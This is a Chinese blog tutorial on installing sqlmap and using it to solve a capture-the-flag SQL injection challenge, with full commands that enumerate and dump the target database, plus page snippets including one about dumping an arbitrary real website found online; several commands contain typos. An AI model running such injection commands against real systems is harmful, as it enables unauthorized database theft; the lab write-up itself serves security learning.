sqlmap

最新推荐文章于 2023-02-27 14:22:17 发布
最新推荐文章于 2023-02-27 14:22:17 发布
阅读量330 收藏
点赞数
分类专栏: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44105778/article/details/88082052
版权

使用的环境是Ubuntu系统
在这里插入图片描述

sqlmap的安装

sqlmap需要安装python2环境,python3不行(Ubuntu下默认安装python2)
输入命令:sudo apt sqlamp
检查是否安装成功
输入命令:sqlmap -help返回下面结果即为成功。
在这里插入图片描述

sqlmap基本参数

sqlmap -h 查看帮助选项
is -dba 当前用户权限
dbs 所有数据库
current-db 网站当前数据库
users 所有数据库用户
current-user 当前数据库用户
tables 参数:列表名
columns 参数:字段名
dump 参数:下载数据

sqlmap牛刀小试

我们以这到题为例http://www.shiyanbar.com/ctf/33。
如果没有注册过实验吧的朋友先注册下实验吧
拿到题目我们判断下有没有sql注入

在url后面加上and 1=1,没有报错
加上and 1=2,报错。
说明有sql注入

在这里插入图片描述
在这里插入图片描述
第一步使用sqlmap查看数据库信息
输入命令:sqlmap -u "http://ctf5.shiyanbar.com/8/index.php?id=1" --current-db
在这里插入图片描述
经过一些时间成功爆出当前数据库为my_db,如果注入过程提示选择y或者n,一般是选择y。大概就是尝试更多的方法进行注入
第二步、爆出表名
输入命令:sqlmap -u "http://ctf5.shiyanbar.com/8/index.php?id=1" -D my_db --tables

在这里插入图片描述
第三步爆字段名
输入命令:

sqlmap -u "http://ctf5.shiyanbar.com/8/index.php?id=1" -D my_db -T thiskey --columnsy

在这里插入图片描述
第四步、爆数据
输入命令:

sqlmap -u "http://ctf5.shiyanbar.com/8/index.php?id=1" -D my_db -T thiskey -C k0y --dump

稍等片刻,成功找到flag:whatiMyD91dump
在这里插入图片描述

giunwr
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
记一次系统被sql注入搞挂的惨痛经历
lisu061714112的专栏
04-22 2767
前言 最近我在整理安全漏洞相关问题,准备在公司做一次分享。恰好,这段时间团队发现了一个sql注入漏洞:在一个公共的分页功能中,排序字段作为入参,前端页面可以自定义。在分页sql的mybatis mapper.xml中,order by字段后面使用$符号动态接收计算后的排序参数,这样可以实现动态排序的功能。 但是,如果入参传入: id; select 1 -- 最终执行的sql会变成: select * from user order by id; select 1 -- limit 1,20 –会把后面
sqlmap 常用参数
idooooo的博客
07-18 1003
2.sqlmap 常用参数 -p 指定参数 例如 -p id -dbs 输出所有 无参数 --current 当前 例如 --current-db -D 指定 --tables 列出所有表 例如 -D phplyb --tables -T 指定表 例如 -D phplyb
sqlmap的使用详解(一:概念性较强,涉及众多参数解释,主要是介绍)
→_→
10-08 1294
目录 sqlmap简介 sqlmap支持五种不同的注入模式: sqlmap支持的数据有: 检测注入 基本格式 跟随302跳转 cookie注入 从post数据包中注入 注入成功后 获取数据基本信息 从数据中搜索字段 读取与写入文件 sqlmap详细命令: Options(选项): Target(目标): Request(请求): Enumeration(枚举): Optimization(优化): Injection(注入): Detection(检测): T
Sqlmap之“你的数据我所见”
weixin_30952535的博客
08-22 674
废话不多说,介绍和理论啥的网上一搜一大把,一次只为tuoku。 实战操作: 1、在网上找个index.php?id=1的站点 2、很明显看到了脱下裤子的希望,sqlmap走一把。查看数据 3、怎么看不到字段就停止了呢,继续看下。查看表 4、看到数据中的表了,还想要继续再来点料。来查看下ra_sigle表里有什么字段 5、想要的好像都有了,最关键的来了,看下表里...
SQLMAP深入分析-使用篇(基础使用、进阶命令、tamper脚本)
Love&Share
12-29 2万+
文章目录使用篇基础命令进阶命令输出信息的详细程度目标指定连接时信息指定注入参数指定检测级别指定注入类型枚举信息用例指定数据包注入伪静态注入暴力破解文件操作执行命令UDF提权有状态带外连接:Meterpreter & friends访问 Windows 注册表常规选项Tamper脚本tamper 适用的数据类型 & 版本自带tamper介绍代码分析攻防 学安全的都知道这个注入神器 Sqlmap,也正是这些神器的出现,我们逐渐变成了“脚本小子”,要想变成大佬,就要求不仅会用还会写,在面试中也.
sqlmap-master
01-04
SQLMap:渗透测试中的神器》 SQLMap是一款开源的自动化SQL注入工具,主要用于检测网站应用程序是否存在SQL注入漏洞,并能够进一步利用这些漏洞进行数据的控制和数据的提取。标题"sqlmap-master"暗示了我们讨论...
SQLmap压缩包,SQLmap压缩包
06-07
SQLmap是一款强大的、自动化的SQL注入工具,主要用于检测和利用SQL注入漏洞,它可以帮助安全研究人员或渗透测试者发现并利用网站数据的安全弱点。这个压缩包`sqlmapproject-sqlmap-1230e57`很可能包含了SQLmap的源...
SQLMAP Windows
最新发布
02-23
SQLMAP是一款著名的自动化SQL注入工具,专用于检测和利用网站应用程序中的SQL注入漏洞。它可以在Windows操作系统上运行,为安全研究人员和渗透测试人员提供了一种高效且强大的手段来测试目标系统的安全性。 在...
sqlmap安装包
01-19
**SQLMap介绍** SQLMap是一款开源的自动化SQL注入工具,专为检测和利用SQL注入漏洞而设计。它能够帮助安全研究人员或渗透测试人员快速、准确地发现和利用目标系统中的SQL注入漏洞,从而提高测试效率。SQLMap的强大...
sqlmap注入
10-26
SQLMap是一种广泛使用的开源自动化工具,专门用于检测和利用SQL注入漏洞。它的主要目标是帮助安全研究人员和渗透测试者在Web应用程序中发现和利用数据漏洞。以下是对SQLMap注入相关知识点的详细介绍: **1. SQL...
SQLMap使用|命令大全(干货)
qq_45719090的博客
02-27 1万+
适合新手的sqlmap使用教程,附带sqlmap命令
史上最详细的sqlmap使用教程
热门推荐
大河之犬的博客
09-19 4万+
sqlmapsqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL进行SQL注入。目前支持的数据有MySql、Oracle、Access、PostageSQL、SQL Server、IBM DB2、SQLite、Firebird、Sybase和SAP MaxDB等Sqlmap采用了以下5种独特的SQL注入技术基于布尔类型的盲注,即可以根据返回页面判断条件真假的注入。
Sqlmap 随记
orchid_sea的博客
04-27 760
sqlmap安装 linux环境下键入命令 apt install sqlmap 老师说,如果遇到如图问题,把文件删掉重新安装就好了;但是呢,按照这个方式我没有解决掉。 那就重新安装sqlmap和依赖吧: 按照提示,先更新一下apt工具 apt-get update 工具更新完再安装sqlmap 安装完就能成功进入sqlmapsqlmap GET注入 sqlmap -u "http://192.168.181.1/pikachu-master/vul/sqli/sqli_str.php?name=a
详解新手如何使用sqlmap对mysql数据进行注入攻击
1匹黑马
03-08 2725
步骤1:发现注入 闲来没事儿在网上瞎逛,无意中点开一个国外的博客,发现链接是以id为结尾的,于是就手工检测了一下,结果嘛…你懂的 检测页面返回不正常,明显是带入数据查询了,并且没有WAF,老弟就只好给你上一课啦嘻嘻嘻 这里需要注意一下: mysql跟Access有些不同,mysql数据里有很多个数据,我们需要知道网站自己的数据,以便于得到管理的账号密码,它的结构大体是这样的: 步骤二:使用...
Sqlmap详解使用
白白白
09-03 5914
转载自https://www.anquanke.com/post/id/235846 作者:谢公子 感谢作者,内容非常详细。 Sqlmap sqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL进行SQL注入。目前支持的数据有MySql、Oracle、Access、PostageSQL、SQL Server、IBM DB2、SQLite、Firebird、Sybase和SAP MaxDB等 Sqlmap采用了以下5种独特的SQL注入技术 基于布尔类型的盲注,即可
sqlmap参数大全
卖瓜小农的博客
02-23 8534
sqlmap参数大全 cookie注入:sqlmap.py -u 注入点 --cookie “参数” --tables --level 2 POST登录框注入:sqlmap.py -r 从文件读取数据 -p 指定的参数 --tables sqlmap.py -u 登录的地址 --forms 自动判断注入 sqlmap.py -u 登录的地址 --data “指定参数” 绕过waf防火墙:sqlmap.py -u 注入点 -v 3 --dbs --batch --tamper space2morehash.
3.iBatis删除操作教程
11-18 698
转自:http://taojintianxia-ibatis.group.iteye.com/group/wiki 我希望通过上面的例子,你能完全懂得如何向数据执行插入或者查询操作.所以在本例中你将学习到如何通过iBatis在数据中删除数据.所以你需要分析代码并清楚的理解在这些代码里到底发生了什么.然而你绝对不需要再创建一个不同的数据,虽然你知道我们使用上一个MySQL作为数据而且你已经
sqlmap渗透测试工具用户指南
"sqlmap用户手册是一份详细的技术文档,主要介绍了开源的渗透测试工具sqlmap的使用方法和功能。该工具自动检测并利用SQL注入漏洞,接管数据服务器。手册包含强大的检测引擎、多种专有功能,适用于高级渗透测试者,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值